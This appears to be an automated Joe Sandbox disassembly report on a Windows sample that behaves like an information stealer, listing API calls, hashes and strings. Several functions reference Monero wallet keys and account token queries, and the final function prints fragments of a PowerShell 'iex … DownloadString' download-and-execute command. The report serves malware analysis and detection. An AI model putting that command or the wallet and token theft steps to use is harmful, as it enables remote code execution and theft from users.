                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: 36ad92d0c852bcc6a75d82e04cda00479c16c7d8f618b1d0d8e738d1bf6887f7
                            • Instruction ID: 0257cf703ac0bb36b62e345ead26a3c03a56f76d9a1a426b4b620f5f404b36b8
                            • Opcode Fuzzy Hash: 36ad92d0c852bcc6a75d82e04cda00479c16c7d8f618b1d0d8e738d1bf6887f7
                            • Instruction Fuzzy Hash: 16613BB580426C9BDB25EB50CC45FDAB7B9FF44304F1081E9E649AA141DBB09BC9CFA1
                            Function 0038BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0038BC9F
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0038BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0038BDA5
                            • lstrlen.KERNEL32(00000000), ref: 0038BDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 7b0776277699f218ba864e62308f9e823e188708d95b25aedd59999d087f822a
                            • Instruction ID: 67c0bd1e56b15e401caf2c0f9e538af44717d56aa04d88ec3af7af763cc8b6ea
                            • Opcode Fuzzy Hash: 7b0776277699f218ba864e62308f9e823e188708d95b25aedd59999d087f822a
                            • Instruction Fuzzy Hash: 83B141729106189BDF06FBA0DD96EEE7778BF54300F404258F506AA091EF346E49DBE2
                            Function 00396770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 2b566722f51e37453ee8ee065ca5b3221a9a7f43ebfb754635db2598cdba3ceb
                            • Instruction ID: 79a8265c5936548aa9c5a27bd38ea24e9cc9f2bf2a862d9709ccbc26b039a99a
                            • Opcode Fuzzy Hash: 2b566722f51e37453ee8ee065ca5b3221a9a7f43ebfb754635db2598cdba3ceb
                            • Instruction Fuzzy Hash: 9FF05E3590520DEFD7449FE0ED1EB2C7FB4FB1470BF040199E60986290D6704B46AB96
                            Function 00384FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00384FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00384FD1
                            • InternetOpenA.WININET(003A0DDF,00000000,00000000,00000000,00000000), ref: 00384FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00385011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00385041
                            • InternetCloseHandle.WININET(?), ref: 003850B9
                            • InternetCloseHandle.WININET(?), ref: 003850C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: ed9ef68628e03aa4eba4899b8eea2de5b581b958ad73c92089e1edac346a2f61
                            • Instruction ID: 3887ab6cfcd3adbea5c93de419f1a2112df41f8f2199513d8a410d4067708ddc
                            • Opcode Fuzzy Hash: ed9ef68628e03aa4eba4899b8eea2de5b581b958ad73c92089e1edac346a2f61
                            • Instruction Fuzzy Hash: 4D31F7F4A0021CABDB20DF54DC85BDDBBB4FB48708F1081D9EA09A7281D7706AC59F99
                            Function 003983DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00398426
                            • wsprintfA.USER32 ref: 00398459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0039847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0039848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00398499
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,0115E370,00000000,000F003F,?,00000400), ref: 003984EC
                            • lstrlen.KERNEL32(?), ref: 00398501
                            • RegQueryValueExA.ADVAPI32(00000000,0115E1C0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003A0B34), ref: 00398599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00398608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0039861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: e4bb417d9937b2119fe535c10f980c29a88008b83c8b839fd1f3f95a3b22ffa4
                            • Instruction ID: 3e6b7ed1cc97d9c1da75357b18dfc09011897963d97e64a7b6ce016433c36981
                            • Opcode Fuzzy Hash: e4bb417d9937b2119fe535c10f980c29a88008b83c8b839fd1f3f95a3b22ffa4
                            • Instruction Fuzzy Hash: BB21E77191022CAFDB24DB54DC85FE9B7B8FB48704F00C598E649A6140DF71AA85CFE4
                            Function 00397690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003976A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003976AB
                            • RegOpenKeyExA.ADVAPI32(80000002,0114C0A8,00000000,00020119,00000000), ref: 003976DD
                            • RegQueryValueExA.ADVAPI32(00000000,0115E2C8,00000000,00000000,?,000000FF), ref: 003976FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00397708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: cb8db5e02f2800df3a77282e64789d8ef4bd6adad56fadcc4b767b83ff80461e
                            • Instruction ID: d2e6878628788803fc740dcb17c03927ac5f5ad17e326620573cbb17d08cb6f6
                            • Opcode Fuzzy Hash: cb8db5e02f2800df3a77282e64789d8ef4bd6adad56fadcc4b767b83ff80461e
                            • Instruction Fuzzy Hash: 31014FB5A04608BFEB00DBE4DC49F7ABBB8EB58705F104454FA04D7291E67099089B51
                            Function 00397720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0039773B
                            • RegOpenKeyExA.ADVAPI32(80000002,0114C0A8,00000000,00020119,003976B9), ref: 0039775B
                            • RegQueryValueExA.ADVAPI32(003976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0039777A
                            • RegCloseKey.ADVAPI32(003976B9), ref: 00397784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 08a8ea59ff27b3b53c6e1d2a04e8d88fabd05030b4b664760667eb91ad1d3b29
                            • Instruction ID: a241734f3ffb934f4067e92453623950949a34bd48407d1420da31ee2bfcd2ff
                            • Opcode Fuzzy Hash: 08a8ea59ff27b3b53c6e1d2a04e8d88fabd05030b4b664760667eb91ad1d3b29
                            • Instruction Fuzzy Hash: FE0112B5A4030CBFEB00DBE4DC4AFBEBBB8EB58705F104559FA05A7281DB705A049B91
                            Function 003992E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(:9,80000000,00000003,00000000,00000003,00000080,00000000,?,00393AEE,?), ref: 003992FC
                            • GetFileSizeEx.KERNEL32(000000FF,:9), ref: 00399319
                            • CloseHandle.KERNEL32(000000FF), ref: 00399327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :9$:9
                            • API String ID: 1378416451-4108897303
                            • Opcode ID: 3943233a66b01b6e75de5f958ebd01fc48ae45172291cf9d6ceac6b5de662fbb
                            • Instruction ID: 452fd9cbc717bd64792a471d4d0a085ea2f1c856977c538733bc99e97081d0a1
                            • Opcode Fuzzy Hash: 3943233a66b01b6e75de5f958ebd01fc48ae45172291cf9d6ceac6b5de662fbb
                            • Instruction Fuzzy Hash: 06F03C79E40208FBDF10DFB4DC49F9E7BF9EB58710F118258B651A72C0E67096459B50
                            Function 003899C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 251152cac92f4f1204448afad754a70a7fbe69006cd60e1841eef95597b80e19
                            • Instruction ID: 00f62bc10d2f06762c1ce2811320b38808553349923b31f288be8432a9452333
                            • Opcode Fuzzy Hash: 251152cac92f4f1204448afad754a70a7fbe69006cd60e1841eef95597b80e19
                            • Instruction Fuzzy Hash: 803116B4A00309EFDB15DF94C885FAE7BB9FF48304F108199E911A7290D778AA45CFA1
                            Function 00394780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,0115E538), ref: 003947DB
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00394801
                            • lstrcat.KERNEL32(?,?), ref: 00394820
                            • lstrcat.KERNEL32(?,?), ref: 00394834
                            • lstrcat.KERNEL32(?,0114B958), ref: 00394847
                            • lstrcat.KERNEL32(?,?), ref: 0039485B
                            • lstrcat.KERNEL32(?,0115DC00), ref: 0039486F
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 00398D90: GetFileAttributesA.KERNEL32(00000000,?,00381B54,?,?,003A564C,?,?,003A0E1F), ref: 00398D9F
                              • Part of subcall function 00394570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00394580
                              • Part of subcall function 00394570: RtlAllocateHeap.NTDLL(00000000), ref: 00394587
                              • Part of subcall function 00394570: wsprintfA.USER32 ref: 003945A6
                              • Part of subcall function 00394570: FindFirstFileA.KERNEL32(?,?), ref: 003945BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 8f0cf2a26f38902b8e247d5a0c2c5906185ebdd31018c958c6d3f14b4ccf1214
                            • Instruction ID: 8ab92cd689779097317d1f8185965364b3abbca654ce664b8130c6dff7d0d0ac
                            • Opcode Fuzzy Hash: 8f0cf2a26f38902b8e247d5a0c2c5906185ebdd31018c958c6d3f14b4ccf1214
                            • Instruction Fuzzy Hash: F13184B290021C5BCF12F7B0DC85EE9777CAB58704F404589B315EA081EE749B8ECB95
                            Function 00392C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00392D85
                            Strings
                            • <, xrefs: 00392D39
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00392CC4
                            • ')", xrefs: 00392CB3
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00392D04
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
